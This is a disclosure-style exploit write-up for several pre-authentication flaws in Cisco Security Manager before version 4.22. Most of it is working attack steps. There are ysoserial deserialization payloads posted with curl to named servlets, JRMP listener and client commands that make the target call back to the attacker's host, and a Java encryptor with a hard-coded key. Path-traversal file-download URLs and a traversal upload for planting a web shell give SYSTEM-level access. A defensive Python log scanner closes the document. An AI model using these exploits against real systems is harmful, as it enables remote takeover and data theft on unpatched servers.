# TLDR
> Cisco Security Manager is an enterprise-class security management
> application that provides insight into and control of Cisco security and
> network devices. Cisco Security Manager offers comprehensive security
> management (configuration and event management) across a wide range of Cisco
> security appliances, including Cisco ASA Adaptive Security Appliances, Cisco
> IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs),
> Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and
> many more. Cisco Security Manager allows you to manage networks of all sizes
> efficiently, from small networks to large networks consisting of hundreds of
> devices.
Several **pre-auth vulnerabilities** were submitted to Cisco on 2020-07-13 and
(according to Cisco) **patched in version 4.22** on 2020-11-10. The release notes
did not mention the vulnerabilities, and no security advisories were published.
All payloads are processed in the context of **NT AUTHORITY\SYSTEM**.
Requirement: download _commons-beanutils-1.6.1.jar_ from the Maven Central
repository.
# Remote Code Execution SecretService.jsp :-)
```sh
java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar \
  ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils
curl -k --request POST --data-binary "@payload_CommonsBeanutils" \
  https://[TARGET_HOST]/CSCOnm/servlet/SecretService.jsp
```
# Remote Code Execution CsJaasServiceServlet
Compile JaasEncryptor.java and replace the _b64Payload_ content with the
base64-encoded JRMPClient payload (see the `base64 -w0` step below):

```java
import java.security.InvalidKeyException;
import java.util.Arrays;
import java.util.Base64;
import com.cisco.nm.cmf.security.jaas.BlobCrypt;

public class JaasEncryptor {
    public static void main(String[] args) throws Exception {
        // Base64-encoded serialized payload; replace with your own JRMPClient output.
        String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";
        byte[] payload = Base64.getDecoder().decode(b64Payload);
        // Hard-coded 16-byte key handed to BlobCrypt.
        byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};
        byte[] enc = BlobCrypt.encryptArray(payload, key);
        System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));
        // Round-trip check: decrypting must give back the original bytes.
        byte[] dec = BlobCrypt.decryptArray(enc, key);
        if (!Arrays.equals(dec, payload)) {
            throw new IllegalStateException("round-trip mismatch");
        }
    }
}
```
Prepare the JRMP listener and generate the base64-encoded client payload:

```sh
java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar \
  ysoserial.exploit.JRMPListener 443
java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:443' | base64 -w0
```

Compile and run the encryptor (it prints the encrypted payload):

```sh
javac -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor.java
java -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor
```
Send the payload to the servlet as a request body consisting of the parameter
_cmd=data_, a new line, and _data=[ENCRYPTED_PAYLOAD]_.
# Remote Code Execution AuthTokenServlet
Prepare the JRMP listener and generate the client payload:

```sh
java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar \
  ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"
java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2
```

Send the request:

```sh
curl -k --request POST --data-binary "@payload_JRMP1_2" \
  https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet
```
# Remote Code Execution ClientServicesServlet
Prepare the JRMP listener and generate the client payload:

```sh
java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar \
  ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"
java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_3
```

Send the request:

```sh
curl -k --request POST --data-binary "@payload_JRMP1_3" \
  https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet
```
# Remote Code Execution CTMServlet
```sh
java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar \
  ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils1_2
curl -i -s -k -X $'POST' -H $'Content-Type: application/octet-stream' \
  -H $'CTM-URN: com-cisco-nm-vms-ipintel-IpIntelligenceApi' -H $'CTM-VERSION: 1.5' \
  -H $'CTM-PRODUCT-ID: /C:/Program Files (x86)/CSCOpx/MDC/tomcat/vms/athena/WEB-INF/lib/' \
  -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'User-Agent: Java/1.8.0_222' \
  -H $'Host: [TARGET_IP]' -H $'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' \
  -H $'Connection: keep-alive' --data-binary "@payload_CommonsBeanutils1_2" \
  $'https://[TARGET_IP]/athena/CTMServlet'
```
# Arbitrary File Download XdmConfigRequestHandler
`GET /athena/xdmProxy/xdmConfig[RELATIVE_PATH_TO_FILE]`
# Arbitrary File Download XdmResourceRequestHandler
`GET /athena/xdmProxy/xdmResources[RELATIVE_PATH_TO_FILE]?dmTargetType=TARGET.IDS&dmOsVersion=7.&command=editConfigDelta`
# Arbitrary File Upload XmpFileUploadServlet
Write a web shell, e.g.
`POST /cwhp/XmpFileUploadServlet?maxFileSize=100`
as a normal multipart upload whose _filename_ field carries a traversal path
such as _../../MDC/tomcat/webapps/cwhp/testme.jsp_.
# Arbitrary File Download XmpFileDownloadServlet
`GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=[RELATIVE_PATH_TO_DIRECTORY]&readmeText=1`
This will respond with a ZIP file containing all files from the directory.
# Arbitrary File Download SampleFileDownloadServlet
`GET /cwhp/SampleFileDownloadServlet?downloadZipFileName=pwned&downloadFiles=README&downloadLocation=[RELATIVE_PATH_TO_DIRECTORY]`
This will respond with a ZIP file containing all files from the directory.
# Arbitrary File Download resultsFrame.jsp
`GET /athena/itf/resultsFrame.jsp?filename=[RELATIVE_PATH_TO_FILE]`
# Remote Code Execution SecretServiceServlet
See also <https://de.tenable.com/security/research/tra-2017-23>
```sh
java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar \
  ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"
java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2
curl -k --request POST --data-binary "@payload_JRMP1_2" \
  https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet
```
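As an added example from the defender's side (not part of the original write-up), the following Python script scans Apache/Tomcat common-format access-log lines for the request patterns described above: POSTs to the pre-auth deserialization endpoints, traversal sequences reaching the file-download handlers, and uploads to XmpFileUploadServlet. The endpoint paths are the ones listed on this page, the sample log lines are constructed, and CsJaasServiceServlet is left out because the page gives no URL for it.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Endpoints from the advisory above (CsJaasServiceServlet omitted: the page gives no URL for it).
DESERIALIZATION_PATHS = {
    "/CSCOnm/servlet/SecretService.jsp",
    "/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet",
    "/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet",
    "/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet",
    "/athena/CTMServlet",
}
# File handlers mapped to the query parameter carrying the path (None: path is appended to the URL).
FILE_HANDLERS = {
    "/athena/xdmProxy/xdmConfig": None,
    "/athena/xdmProxy/xdmResources": None,
    "/cwhp/XmpFileDownloadServlet": "downloadDirectory",
    "/cwhp/SampleFileDownloadServlet": "downloadLocation",
    "/athena/itf/resultsFrame.jsp": "filename",
}
UPLOAD_PATH = "/cwhp/XmpFileUploadServlet"  # traversal sits in the multipart filename, not the URL
# Apache/Tomcat common log format: client ident user [time] "METHOD URI PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

def inspect_request(client, method, uri):
    """Return a finding string for one request, or None when it matches no advisory pattern."""
    parts = urlsplit(uri)
    path = unquote(parts.path)  # decode %2e%2e and similar before matching
    query = parse_qs(parts.query, keep_blank_values=True)  # parse_qs decodes its values
    if method == "POST" and path in DESERIALIZATION_PATHS:
        return f"{client}: POST to pre-auth deserialization endpoint {path}"
    if method == "POST" and path == UPLOAD_PATH:
        return f"{client}: POST to {path}; inspect the multipart filename for '..' segments"
    for prefix, param in FILE_HANDLERS.items():
        if path.startswith(prefix):
            values = [path[len(prefix):]] if param is None else query.get(param, [])
            if any(".." in v for v in values):
                return f"{client}: traversal sequence in request to {prefix}"
    return None

def scan_log(lines):
    """Apply inspect_request to every parseable access-log line; returns the findings."""
    hits = (inspect_request(m.group(1), m.group(2), m.group(3)) for m in map(LOG_RE.match, lines) if m)
    return [h for h in hits if h]
# Constructed sample log lines, not taken from any real system.
SAMPLE_LOG = [
    '10.0.0.9 - - [10/Nov/2020:10:00:01 +0000] "POST /CSCOnm/servlet/SecretService.jsp HTTP/1.1" 200 0',
    '10.0.0.9 - - [10/Nov/2020:10:00:02 +0000] "GET /athena/xdmProxy/xdmConfig/%2e%2e/%2e%2e/test.txt HTTP/1.1" 200 44',
    '10.0.0.9 - - [10/Nov/2020:10:00:03 +0000] "GET /cwhp/SampleFileDownloadServlet?downloadZipFileName=x&downloadFiles=README&downloadLocation=../../dir HTTP/1.1" 200 900',
    '10.0.0.9 - - [10/Nov/2020:10:00:04 +0000] "POST /cwhp/XmpFileUploadServlet?maxFileSize=100 HTTP/1.1" 200 12',
    '10.0.0.9 - - [10/Nov/2020:10:00:05 +0000] "GET /athena/itf/resultsFrame.jsp?filename=report.txt HTTP/1.1" 200 55',
]
```

Because the upload servlet's traversal lives in the multipart filename, the access log can only point at the request itself; the request body or the webapps directory has to be checked separately, and the listed endpoints should simply not be reachable without authentication before 4.22.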